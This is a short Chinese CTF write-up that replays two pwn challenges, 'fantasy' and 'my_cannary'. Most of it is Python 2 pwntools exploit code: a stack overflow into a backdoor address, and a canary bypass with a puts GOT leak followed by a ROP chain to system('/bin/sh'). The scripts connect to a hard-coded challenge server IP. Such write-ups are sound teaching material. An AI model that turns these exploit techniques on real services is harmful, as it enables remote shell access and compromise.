GXY复现

fantasy

有后门,简单的栈溢出

# -*- coding: utf-8 -*-
# Python 2 pwntools script: str and bytes are concatenated freely
# ('a'*0x38 + p64(...)), which raises TypeError on Python 3.
from pwn import *
context.log_level = 'debug'
# Remote CTF service from the writeup; the commented line below is the
# local-process alternative.
p = remote('183.129.189.60','10025')
#p = process('./fantasy')
elf = ELF('fantasy')
libc = elf.libc  # resolved against the LOCAL libc; not used in this script
# 0x38 filler bytes presumably reach the saved return address (the writeup
# calls this a simple stack overflow); it is replaced by the fixed code address
# 0x400735, presumably the "backdoor" the writeup mentions. A hard-coded code
# address only works for a non-PIE binary, and a stack canary between the
# buffer and the return address would detect this overwrite — the two standard
# mitigations for this bug class.
p.sendline('a'*0x38+p64(0x400735))
p.interactive()

my_cannary

这个需要看反汇编代码
有一条 xor rdx,[ebp-8] 指令;其中 rdx 是可控的,需要是一个合法地址,[ebp-8] 也可控
通过这里的检验后,发现程序有 system 函数,再通过泄露获取 shell 即可

from pwn import *
#context.log_level = 'debug'
# Python 2 pwntools script (str + bytes concatenation, generator .next()).
p = remote('183.129.189.60','10026')
#p = process('./my_cannary')
elf = ELF('my_cannary')
# NOTE(review): the puts and '/bin/sh' offsets below come from the LOCAL libc;
# they are only valid against the remote if it runs the same libc build.
libc = elf.libc

# Stage 1. 0x30 filler bytes, then elf.symbols['gift'] and 0 in the next two
# slots — per the writeup this satisfies the xor rdx,[ebp-8] check, whose
# reference value sits inside attacker-controlled data (a real stack protector
# keeps its reference value out of the overflowed buffer, which is why this
# hand-rolled check fails as a mitigation). After 8 more filler bytes the
# chain is: 0x400a43 (presumably a gadget loading the first argument register),
# puts@GOT as that argument, puts@PLT, and 0x400998 to return into the program
# so a second payload can be sent.
payload = 'a'*0x30+p64(elf.symbols['gift'])+p64(0)+'a'*8
payload += p64(0x400a43)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(0x400998)

p.sendline(payload)
# puts stops at the first NUL byte, so a little-endian userland address is
# expected to arrive as 6 bytes; they are padded back to 8 for u64. Leaking a
# GOT entry like this is what defeats libc ASLR here.
libc_base = u64(p.recv(6).ljust(8,'\x00')) - libc.symbols['puts']
p.success('libc_base: '+hex(libc_base))

# First '/bin/sh' string found in libc, rebased with the leak (Python 2
# generator .next()).
bin_sh = libc.search('/bin/sh').next()+libc_base
p.success('bin_sh: '+hex(bin_sh))

# Stage 2. Same prologue; the argument register now gets bin_sh and control
# returns to 0x4008BE — per the writeup a location that reaches system, not
# confirmed from this script alone.
payload = 'a'*0x30+p64(elf.symbols['gift'])+p64(0)+'a'*8
payload += p64(0x400a43)+p64(bin_sh)+p64(0x4008BE)
p.sendline(payload)

p.interactive()